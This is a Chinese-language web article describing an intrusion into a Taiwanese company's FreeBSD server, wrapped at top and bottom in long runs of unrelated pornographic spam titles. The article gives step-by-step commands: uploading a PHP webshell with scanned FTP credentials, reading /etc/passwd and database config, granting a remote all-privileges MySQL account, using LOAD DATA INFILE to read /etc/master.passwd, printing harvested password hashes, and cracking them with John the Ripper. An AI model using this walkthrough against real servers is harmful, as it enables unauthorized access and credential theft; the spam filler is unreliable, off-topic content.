精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

利用MYSQL安全檢測FreeBSD服務器(圖)

安全 網站安全
目前針對Windows+MSSQL或Windows+MYSQL的系統,在入侵方面的文章可算不少,大多通過腳本漏洞上傳WebShell,通過Serv-U提升權限,再通過PcAnyWhere或終端連接器遠程連接。

目前針對Windows+MSSQL或Windows+MYSQL的系統,在入侵方面的文章可算不少,大多通過腳本漏洞上傳WebShell,通過Serv-U提升權限,再通過PcAnyWhere或終端連接器遠程連接。就系統而言,大陸用Windows的比較多,港臺和國外很多服務器都是用的Unix、Linux或FreeBSD系統。本文就是針對的FreeBSD+MYSQL+PHP系統,結合一個具體實例,講解了一下入侵思路。其實作者的運氣不錯,遇到了一個大意的管理員——有多少服務器管理員是這樣大意的呢?


圖片1

MYSQL:入侵FreeBSD的橋梁

面對一個PHP網站的時候,我的個人習慣是先看看有沒有PHP注入漏洞,然后再看是否存在整站漏洞,如Discuz!漏洞,PHPbb執行命令漏洞等等。如果存在的話,可以利用它們上傳Webshell,如不存在的話在看看有沒有其它的系統漏洞。這次遇上的是臺灣某網絡工司的服務器,頁面很簡潔,注入漏洞、腳本漏洞都不存在,無奈之下拿出紅客聯盟的HScan v1.20,大概掃描一下看看。掃描結果圖所示。


圖片2

運氣真不錯,掃出一個FTP用戶名和密碼來,服務器還開了22(SSH),3306(MYSQL)兩個重要端口。FTP登錄,然后找一個可以上傳的WEB目錄上傳Phpspy.php,如圖3所示。


圖片3

在瀏覽器里輸入http://211.***.***.91/e***u/lib/phpspy.php,進入Phpspy.php的 “WebShell模式”鍵入命令:id //查看當前用戶:

uid=65534(nobody) gid=65533(nogroup) groups=65533(nogroup)

鍵入命令:uname –a //查看系統:

FreeBSD www.e******u.com 4.3-STABLE FreeBSD 4.3-STABLE #0: Fri May 25 11:10:00 CST 2001     Root@www.e******u.com:/home/usr/src/sys/compile/GENERIC  i386

鍵入命令:cat /etc/passwd   //讀取密碼檔

# $FreeBSD: src/etc/master.passwd,v 1.25 1999/09/13 17:09:07 peter Exp $

#

Root:*:0:0:Charlie &:/Root:/bin/csh

games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin

news:*:8:8:News Subsystem:/:/sbin/nologin

nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin

mysql:*:88:88:MySQL Daemon:/home/db/mysql:/sbin/nologin

www:*:2000:2000:WWW Administrator:/home/www/main:/bin/tcsh

chat:*:2001:2000:Chat Administrator:/home/www/chat:/bin/tcsh

game:*:2002:2000:Game Administrator:/home/www/game:/bin/tcsh

elife:*:2003:2000:eLife Administrator:/home/www/elife:/bin/tcsh

game-tnid:*:1005:0:game-tnid:/home/game-tnid:/bin/tcsh

cyc:*:1010:0:cyc:/home/cyc:/bin/tcsh

webadm:*:1012:1012:webadm:/home/webadm:/bin/tcsh

funker:*:1014:1014:funker:/home/funker:/bin/tcsh

小提示:FreeBSD的密碼加密后存放在/etc/master.passwd文件下,而不像Unix 一樣存放在/etc/shadow文件下,而且此文件只有Root用戶可以讀。

通過文件Globalvar.inc讀取數據庫信息如下:

$ethink4u_db = "web123"; // database info

$ethink4u_db_user = "Root";

$ethink4u_db_passwd = "";

$ethink4u_db_host = "localhost";

進入Phpspy.php的“SQL的查詢”頁面,連接數據庫,連接的數據名不是上面的“web123”而是“mysql”,連接成功后,輸入如下命令:

GRAWindows ALL PRIVILEGES ON *.* TO system@’%’IDEWindowsIFIED BY ’askyou’ WITH GRAWindows OPTION

一個遠程的具有Root權限的用戶“system”,密碼為:“askyou”就建成了!這樣就可以通過牛族MYSQL連接器遠程連接,整個數據庫的生殺大權就掌握在你的手中了!

連接后執行如下命令來讀取/etc/master.passwd:

user mysql; //打開數據庫mysql

create table yongge(str TEXT); //創建表yongge

load data infile “//etc//master.passwd” into table yongge;把文件master.passwd讀到表中

seletc * from yongge into outfile “//tmp//passwd”;把表中內容輸出到passwd文件中

drop table yongge; 刪除表

馬上查看/tmp/passwd文件的內容,怎么是空的?估計我擁有這的個Root權限只是對數據有最大限權,可以任意操縱數據庫,而非系統的Root。

換一種思路吧!我們給它上傳一個PhpMyAdmin-2[1].6.0-pl3.zip,也可以利用Wget命令下載下一個:“Wget [options] [URL-list]”,然后利用 Unzip命令解壓(MS Windows下的壓縮軟件Winzip壓縮的文件可以用Unzip命令,該命令用于解擴展名為.zip的壓縮文件)。

小知識:Wget的參數較多,但大部分應用只需要如下幾個常用的參數:

 -r 遞歸;對于HTTP主機,Wget首先下載URL指定的文件,然后(如果該文件是一個HTML文檔的話)遞歸下載該文件所引用(超級連接)的所有文件(遞歸深度由參數-l指定)。對FTP主機,該參數意味著要下載URL指定的目錄中的所有文件,遞歸方法與HTTP主機類似。

-N 時間戳:該參數指定Wget只下載更新的文件,也就是說,與本地目錄中的對應文件的長度和最后修改日期一樣的文件將不被下載。

-m 鏡像:相當于同時使用-r和-N參數。

-l  設置遞歸級數;默認為5。-l1相當于不遞歸;-l0為無窮遞歸;注意,當遞歸深度增加時,文件數量將呈指數級增長。

-t  設置重試次數。當連接中斷(或超時)時,Wget將試圖重新連接。如果指定-t0,則重試次數設為無窮多。

-c 指定斷點續傳功能。實際上,Wget默認具有斷點續傳功能,只有當你使用別的FTP工具下載了某一文件的一部分,并希望Wget接著完成此工作的時候,才需要指定此參數。

小知識:Unzip命令語法:unzip [選項] 壓縮文件名.zip。各選項的含義分別為:

-x 文件列表:解壓縮文件,但不包括指定的File文件。

-v 查看壓縮文件目錄,但不解壓。

-t 測試文件有無損壞,但不解壓。

-d 目錄:把壓縮文件解到指定目錄下。

-z 只顯示壓縮文件的注解。

-n 不覆蓋已經存在的文件。

-o 覆蓋已存在的文件且不要求用戶確認。

-j 不重建文檔的目錄結構,把所有文件解壓到同一目錄下。

得到PhpMyAdmin后,再修改文件Config.inc.php的變量,修改成如下格式:

$cfg[’Servers’][$i][’user’]= ’Root’;  // MySQL user

$cfg[’Servers’][$i][’password’] = ’’;  // MySQL password在游覽器里輸入http://211.***.***.91/e***u/lib/phpMyAdmin-2.6.0-pl3/index.php就可以通過Phpmyadmin管理整個數據庫了!然后進入Phpspy的WebShell模式,輸入命令如下:

locate passwd
/etc/master.passwd

/etc/passwd

/home/game-tnid/game0131/adm/passwd

/home/game-tnid/gameDemoCopyFrom_game0131/adm/passwd

/home/usr/src/etc/master.passwd

/home/usr/src/release/picobsd/floppy.tree/etc/master.passwd

/home/usr/src/usr.bin/passwd

/home/www/chat/adm/passwd

/home/www/chat.old91/adm/passwd

/home/www/cycgame/idot.20030320/coop_adm/passwd

/home/www/game/game.0727/adm/passwd

/home/www/main/DBabcd/passwd

/home/www/main/ethink4u/hotnews/admin/passwd

/mirror/etc/master.passwd

/mirror/etc/passwd

/usr/bin/passwd查看它們內容后整理密碼檔如下:

Root:$1$xOOaGnKU$U9QdsCI40XXcCUMBN.7Az.:0:0::0:0:Charlie &:/Root:/bin/sh

funker:Hk3kVaBMnSZ2s

chat:Ecu/FE6CVZKME

game-tnid:EfyN8aw51ADXw

game:h2J9eAOTG4INA

cyc:6z3daN06RdVeU

利用工具JOHN可以破解以上密碼檔。它的命令行方式:john [-功能選項] [密碼文件名]。現在開始進行解密步驟:

先消滅FOOL USER,就是“笨蛋用戶”:john -single shadow.txt;

再消滅稍微聰明一點的用戶:john -wordfile:password.lst -rules shadow.txt;

最后進行大屠殺:john -i:all shadow.txt(當然,第三步可能要你的電腦跑上10000年)。

因為服務器開了22端口,利用工具Eric’s Telnet 98 V8.4-SSH (http://www2.skycn.com/soft/1157.html)就可以遠程登錄上去了。

小提示:22端口的SSH是Secure SHell的縮寫,它是一個用來替代Telnet、FTP以及R命令的工具包,主要是想解決口令在網上明文傳輸的問題。

整個過程中運氣真的很不錯,后來Funker,cyc這兩個用戶的密碼我利用一臺P4+256DDR的機器,跑了兩天也跑出來了,www的用戶名密碼和FTP相同(不知道是不是巧合)。通常的方法是找一個Exploit,然后利用GCC命令編譯后運行并提升權限,這里就不繼續討論了。

【編輯推薦】

  1. 如何使用FreeBSD防火墻保護企業網絡
  2. MySQL數據庫災備的基礎知識大全
  3. MySQL安全攻防實戰指南之體系結構篇
責任編輯:Oo小孩兒 來源: 黑客軟件園
相關推薦

2009-03-04 06:37:00

2011-04-11 11:05:07

FreeBSD 8.1

2011-01-13 15:57:20

FreeBSD 8.1vsftpd

2009-12-11 17:31:57

2009-06-20 18:33:41

2011-01-10 14:48:22

2014-09-01 10:02:17

2018-01-31 11:20:48

2011-12-07 17:05:45

JavaNIO

2011-01-07 09:44:13

2012-02-08 09:38:33

2010-08-05 09:43:09

NFS服務器安全

2021-06-18 12:50:55

Cloud開源工具漏洞

2010-06-04 16:52:11

MySQL服務器

2010-11-04 15:32:05

SecSSM服務器安全網神

2018-07-06 09:48:00

2010-04-28 13:10:04

龍芯刀片服務器圖賞

2015-05-05 11:27:01

2011-03-22 09:03:47

Nagios配置

2009-02-28 14:23:02

點贊
收藏

51CTO技術棧公眾號

一区二区三区视频免费观看| heyzo高清中文字幕在线| 天使萌一区二区三区免费观看| 亚洲色图偷窥自拍| 91网址在线观看精品| 九色porny丨入口在线| 国产欧美精品一区二区色综合 | 国产成人a v| 中文无码久久精品| 亚洲精品色婷婷福利天堂| 182午夜视频| 波多野结衣一本| 欧美日韩成人一区二区| 国产精品免费久久久久久| 天天看片中文字幕| 香蕉一区二区| 91精品国产黑色紧身裤美女| 九九九九免费视频| av免费在线观看网址| 久久精品人人爽人人爽| 丁香婷婷久久久综合精品国产| 国产成人无码精品亚洲| 欧美在线观看天堂一区二区三区| 亚洲美女av电影| 中文字幕乱视频| 久久99成人| 欧美日本一道本在线视频| 欧美一区二区三区爽大粗免费| 五月香视频在线观看| www.色综合.com| 亚洲伊人第一页| 一级特黄特色的免费大片视频| 国产精品视频久久一区| 久久久久久12| 免费网站看av| 亚洲一区 二区 三区| 国产午夜精品一区二区三区 | 在线观看欧美理论a影院| 日韩欧美国产1| 中文字幕1234区| 欧美成人家庭影院| 欧美日韩在线综合| 国产嫩草在线观看| 偷拍精品精品一区二区三区| 欧美日韩性视频| 99热亚洲精品| 丁香花高清在线观看完整版| 一区二区三区中文字幕电影| 亚洲av综合色区| 久做在线视频免费观看| 国产精品理论片| 亚洲综合欧美日韩| 69视频在线| 欧美激情一区二区三区不卡| 日韩欧美一区二区在线观看| 国产毛片在线看| 欧美极品美女视频| 亚洲精品一区二区毛豆| 日本暖暖在线视频| 日韩毛片在线免费观看| 亚洲成年人专区| 免费看电影在线| 亚洲无人区一区| 国产美女网站在线观看| 小h片在线观看| 色婷婷亚洲综合| 妺妺窝人体色www在线观看| 欧美羞羞视频| 欧美精品欧美精品系列| 91网址在线观看精品| 亚洲成人五区| 日韩精品中文字幕在线| 免费看黄色的视频| 日韩av久操| 欧美成人激情在线| 久久精品美女视频| 久久一区欧美| 成人国产精品久久久| www.av导航| 97se狠狠狠综合亚洲狠狠| 欧美一区2区三区4区公司二百| 成人在线视频成人| 玉米视频成人免费看| 男人添女荫道口图片| 欧美最新精品| 欧美v国产在线一区二区三区| 怡红院一区二区| 国内精品视频在线观看 | 韩国一级黄色录像| 国内自拍视频一区二区三区 | 青青草综合在线| 国产传媒在线| 欧美日韩高清一区二区三区| 潘金莲一级淫片aaaaa| 米奇777超碰欧美日韩亚洲| 久久精品99无色码中文字幕 | 欧美黑人xx片| 在线视频你懂得一区| 思思久久精品视频| 亚洲瘦老头同性70tv| 欧美成人激情视频免费观看| 欧美精品一二三四区| 国产主播一区二区| 农村寡妇一区二区三区| 永久免费网站在线| 欧美亚洲国产一卡| av网站有哪些| 这里只有精品在线| 国产欧美日韩中文字幕在线| 天堂资源中文在线| 亚洲卡通欧美制服中文| 性欧美极品xxxx欧美一区二区| 视频二区欧美| www.欧美精品| 无码日韩精品一区二区| 丁香六月久久综合狠狠色| 亚洲一二区在线| 性xxxxfreexxxxx欧美丶| 日韩欧美国产三级电影视频| 女人18毛片毛片毛片毛片区二 | 亚洲.国产.中文慕字在线| 国产成年人视频网站| 久久不见久久见中文字幕免费 | 三级在线免费观看| 精品无人乱码一区二区三区| 亚洲成年人影院在线| 曰本女人与公拘交酡| 九色综合狠狠综合久久| 欧美一级国产精品| 国产精品福利一区| 国产麻豆视频精品| 日韩午夜在线观看视频| 美女久久久久久久久久| 影院欧美亚洲| 91精品天堂| 综合图区亚洲| 免费成人黄色网| 国产乱码字幕精品高清av| 麻豆av福利av久久av| 成人女同在线观看| 日韩欧美一区二区在线视频| 三级黄色在线观看| 蜜臀久久99精品久久久久久9 | 国产精品99久久免费黑人人妻| 999久久久精品一区二区| 欧美成人亚洲成人| 国产aⅴ一区二区三区| 亚洲四区在线观看| 在线一区二区不卡| 欧美另类亚洲| 色综合天天综合在线视频| 国产a级片网站| 一区视频网站| 欧美激情中文字幕在线| 亚洲精品国产精品国| 亚洲影院免费观看| 蜜臀aⅴ国产精品久久久国产老师 性活交片大全免费看 | 欧美午夜不卡在线观看免费| 欧洲美熟女乱又伦| 美国一区二区三区在线播放 | 香蕉久久国产| 日本一区二区视频| 国产69精品久久久久9999人| 永久免费看mv网站入口亚洲| 91中文字幕在线视频| 亚洲欧美日韩国产中文在线| 国产日韩欧美久久| 午夜精品偷拍| 精品久久中出| 成人国产精品一区二区免费麻豆 | 美女福利视频在线观看| 成人午夜短视频| 国产真实乱子伦| 欧美少妇xxxx| 999在线观看免费大全电视剧| 成人三级小说| 中文字幕9999| 懂色av一区二区三区四区| 懂色av一区二区三区| 欧美亚洲色综久久精品国产| 国产精品亚洲а∨天堂免在线| 日韩精品 欧美| 欧美手机在线| 国产精品久久久久久久小唯西川| 中文日产幕无线码一区二区| 日韩在线免费高清视频| 黄色小视频免费在线观看| 欧美这里有精品| 国产一级黄色av| 国产人成一区二区三区影院| 日本中文字幕有码| 水蜜桃久久夜色精品一区的特点 | 日韩美一区二区三区| 精品国产一区二区三区四| 一色桃子久久精品亚洲| 91视频啊啊啊| 国产在线精品一区二区| 青青草原av在线播放| 在线成人直播| 日韩精品久久一区二区三区| 伊人久久影院| 国产精品欧美一区二区| 98色花堂精品视频在线观看| 色妞色视频一区二区三区四区| 亚洲免费不卡视频| 欧美日韩亚洲高清一区二区| 日本一区二区网站| 亚洲欧洲美洲综合色网| 国产偷人妻精品一区| 国产精品香蕉一区二区三区| 精品亚洲一区二区三区四区| 一区二区三区国产盗摄| 大桥未久一区二区三区| 成人激情视频| 欧美一区二区综合| 久久97精品| 成人在线视频网址| 午夜精品久久久久久毛片| 国产成人精品综合| 丝袜老师在线| 久久久欧美一区二区| 最新国产在线拍揄自揄视频| 最新亚洲国产精品| 成人在线观看免费| 亚洲欧美日韩第一区| 姝姝窝人体www聚色窝| 欧美一级淫片007| 一二区在线观看| 欧美在线免费播放| 成人毛片在线播放| 精品久久香蕉国产线看观看亚洲| 曰本女人与公拘交酡| 亚洲色图另类专区| 三级全黄做爰视频| 中文字幕av资源一区| 亚洲自拍偷拍图| 国产日韩欧美亚洲| 在线不卡av电影| 国产亚洲一区字幕| 久操视频免费看| 久久综合久久综合久久综合| 国内精品久久99人妻无码| 91首页免费视频| 久久久无码人妻精品一区| 久久久美女毛片| 国产三级av在线播放| 久久久久国产免费免费| av男人的天堂av| 欧美国产日韩精品免费观看| 纪美影视在线观看电视版使用方法| 久久精品免视看| 香蕉久久久久久久| 亚洲人成精品久久久久| 欧美人妻一区二区| 亚洲h精品动漫在线观看| 91看片在线播放| 色999日韩国产欧美一区二区| 波多野结衣影片| 欧美色综合久久| 一卡二卡三卡在线| 精品人在线二区三区| 天天操天天干天天| 亚洲天堂影视av| 国产在线1区| 久久久久久久影院| 中文在线中文资源| 国产精品久久久久免费a∨大胸 | 自拍偷拍欧美视频| 国产精品丝袜白浆摸在线| 国产精品一区二区美女视频免费看| av一区二区三区在线观看| 欧美一区二区三区久久| 天堂社区 天堂综合网 天堂资源最新版| 日韩av片子| 中国丰满熟妇xxxx性| 视频一区视频二区中文| 手机精品视频在线| va亚洲va日韩不卡在线观看| 91l九色lporny| 亚洲免费毛片网站| 九九热精品视频在线| 欧美日韩激情在线| 欧美一区二不卡视频| 在线视频日本亚洲性| 欧美14一18处毛片| 国产精品成av人在线视午夜片| 日韩成人在线一区| 久久精品国产99精品国产亚洲性色| 日韩精品欧美激情一区二区| 欧妇女乱妇女乱视频| 青青草精品视频| 免费看黄色片的网站| 亚洲国产精品二十页| 国产成人精品亚洲男人的天堂| 欧美日韩国产天堂| 午夜视频免费看| 不卡中文字幕av| 欧美国产大片| 国产精品乱码| 999成人精品视频线3| 免费观看日韩毛片| 国产传媒欧美日韩成人| 天堂在线中文视频| 午夜激情综合网| 99热这里只有精品1| 中文字幕最新精品| 26uuu亚洲电影| 99在线视频首页| 99久久亚洲精品| 一区二区在线播放视频| 99国产精品国产精品久久| 少妇aaaaa| 欧美日韩精品一区二区| 久草视频视频在线播放| 国模gogo一区二区大胆私拍 | 国产精品23p| 欧美丰满美乳xxx高潮www| 国产最新视频在线| 91精品国产乱码久久久久久久久| 亚洲视频国产| 免费观看黄色大片| 久久99精品久久久久久久久久久久| 欧美做受高潮6| 欧美视频在线免费| 手机在线不卡av| 国模精品视频一区二区| 9l视频自拍九色9l视频成人| 美女在线免费视频| 国精产品一区一区三区mba桃花 | 1024成人| 高清中文字幕mv的电影| 亚洲影院久久精品| 精品久久久久成人码免费动漫| 久久精品视频在线播放| 啪啪av大全导航福利综合导航| 日韩欧美精品一区二区三区经典| 久久久久久夜| 日本一级免费视频| 色综合激情久久| 成黄免费在线| 国产精品一区二区三区成人| 日韩久久精品| 日本高清一区二区视频| 日韩一区中文字幕| 国产欧美日韩成人| 久久91精品国产91久久跳| 国产美女视频一区二区| 成人短视频在线观看免费| 成人性视频免费网站| 日本少妇在线观看| 亚洲精品视频中文字幕| 成人私拍视频| 色噜噜一区二区| 久久99九九99精品| 国产乱国产乱老熟300| 精品国产一区二区三区不卡| 福利在线免费视频| 欧美精品一区二区三区四区五区| 天堂一区二区在线免费观看| 人成免费在线视频| 欧美高清视频在线高清观看mv色露露十八 | 成人在线免费电影网站| 秋霞在线一区二区| 大桥未久av一区二区三区中文| 国产成人自拍视频在线| 亚洲一区www| 97色婷婷成人综合在线观看| 少妇一晚三次一区二区三区| 99久久国产综合精品女不卡| 在线视频精品免费| 久久成人亚洲精品| 欧美黄色录像| 中文字幕av专区| 亚洲在线视频一区| 你懂得在线网址| 91免费视频国产| 国产精品日韩久久久| 潮喷失禁大喷水aⅴ无码| 欧美v日韩v国产v| 日韩av首页| 久久久久99精品成人片| 国产亚洲欧美日韩在线一区| 国产视频手机在线观看| 555www成人网| 午夜欧美在线| 国产精品扒开腿做爽爽| 欧美色欧美亚洲另类二区| www.综合网.com| 亚洲电影一二三区| 成人在线一区二区三区| 天天综合久久综合| 高清一区二区三区日本久| 日韩欧美自拍| 艳妇乳肉亭妇荡乳av| 欧美久久久久免费| 正在播放日韩精品| 免费看日本黄色| 国产精品视频免费看| 神马一区二区三区| 亚洲iv一区二区三区|